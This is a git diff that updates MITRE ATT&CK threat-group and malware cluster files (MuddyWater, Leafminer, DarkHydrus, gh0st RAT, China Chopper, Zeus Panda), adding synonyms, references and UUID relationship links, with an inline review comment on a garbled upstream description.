"https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html" ], "synonyms": [ "MuddyWater", + "Seedworm", "TEMP.Zagros" ] }, 
@@ -10900,6 +13085,34 @@ ], "type": "uses" }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ 
@@ -10907,6 +13120,69 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e8545794-b98c-492b-a5b3-4b5a02682e37", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7d6f590f-544b-45b4-9a42-e0805f342af3", "tags": [ 
@@ -10922,56 +13198,70 @@ "type": "uses" }, { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e8545794-b98c-492b-a5b3-4b5a02682e37", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10983,6 +13273,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "269e8108-68c6-4f99-b911-14b2e765dec2", @@ -10994,10 +13312,12 @@ "external_id": "G0077", "refs": [ "https://attack.mitre.org/groups/G0077", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.dragos.com/blog/20180802Raspite.html" ], "synonyms": [ - "Leafminer" + "Leafminer", + "Raspite" ] }, "related": [ 
@@ -11015,34 +13335,6 @@ ], "type": "uses" }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -11050,6 +13342,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ @@ -11058,14 +13357,14 @@ "type": "uses" }, { - "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -11078,6 +13377,34 @@ ], "type": "uses" }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ @@ -11086,7 +13413,7 @@ "type": "uses" }, { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11117,6 +13444,13 @@ ], "type": "uses" }, + { + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ @@ -11125,21 +13459,7 @@ "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8ec6e3b4-b06d-4805-b6aa-af916acc2122", + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -11153,14 +13473,21 @@ "type": "uses" }, { - "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8ec6e3b4-b06d-4805-b6aa-af916acc2122", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11171,5 +13498,5 @@ "value": "DarkHydrus - G0079" } ], - "version": 13 + "version": 15 } diff --git a/clusters/mitre-malware.json b/clusters/mitre-malware.json index 9bbca20..bc1fbae 100644 --- a/clusters/mitre-malware.json +++ b/clusters/mitre-malware.json @@ -41,7 +41,7 @@ "value": "Hacking Team UEFI Rootkit - S0047" }, { - "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [Windows and Linux versions of X-Agent](https://attack.mitre.org/software/S0023).", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).", "meta": { "external_id": "S0314", "mitre_platforms": [ 
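Review bot: The rewritten X-Agent for Android (S0314) description still carries the garbled sentence `Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).`, and replacing the link text with a bare name makes "the CHOPSTICK" read oddly as well. The text is copied verbatim from upstream ATT&CK, so the fix belongs there rather than in this generated file; a short upstream report would resolve it for the next regeneration. Nothing else in this hunk changes, so the new side is otherwise a faithful refresh.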
@@ -141,20 +141,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d9db3d46-66ca-44b4-9daa-1ef97cb7465a", "tags": [ @@ -163,14 +149,28 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -184,7 +184,7 @@ "type": "uses" }, { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -205,14 +205,14 @@ "type": "uses" }, { - "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -294,27 +294,6 @@ ], "type": "uses" }, - { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", "tags": [ @@ -322,41 +301,6 @@ ], "type": "uses" }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", "tags": [ 
@@ -364,6 +308,48 @@ ], "type": "uses" }, + { + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "tags": [ @@ -371,6 +357,20 @@ ], "type": "uses" }, + { + "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", "tags": [ 
@@ -383,7 +383,128 @@ "value": "Pegasus for iOS - S0289" }, { - "description": "[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](http://attack.mitre.org/techniques/T1100) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)", + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)", + "meta": { + "external_id": "S0032", + "mitre_platforms": [ + "Windows", + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0032", + "https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html", + "https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/", + "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/april/decoding-network-data-from-a-gh0st-rat-variant/" + ], + "synonyms": [ + "gh0st RAT" + ] + }, + "related": [ + { + "dest-uuid": "1b1ae63f-bcee-4aba-8994-6c60cee5e16f", + "tags": [ + "estimative-language:likelihood-probability=\"likely\"" + ], + "type": "similar" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "value": "gh0st RAT - S0032" + }, + { + "description": "[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1100) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. 
(Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)", "meta": { "external_id": "S0020", "mitre_platforms": [ @@ -407,6 +528,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -422,14 +550,49 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -447,8 +610,7 @@ "Windows" ], "refs": [ - "https://attack.mitre.org/software/S0007", - "http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/" + "https://attack.mitre.org/software/S0007" ], "synonyms": [ "Skeleton Key" 
@@ -518,27 +680,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -547,7 +688,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -566,6 +707,27 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "ab3580c8-8435-4117-aace-3d9fbe46aa56", 
@@ -612,6 +774,181 @@ "uuid": "b2203c59-4089-4ee4-bfe1-28fa25f0dbfe", "value": "Cherry Picker - S0107" }, + { + "description": "[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)", + "meta": { + "external_id": "S0330", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0330", + "https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More", + "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf" + ], + "synonyms": [ + "Zeus Panda" + ] + }, + "related": [ + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
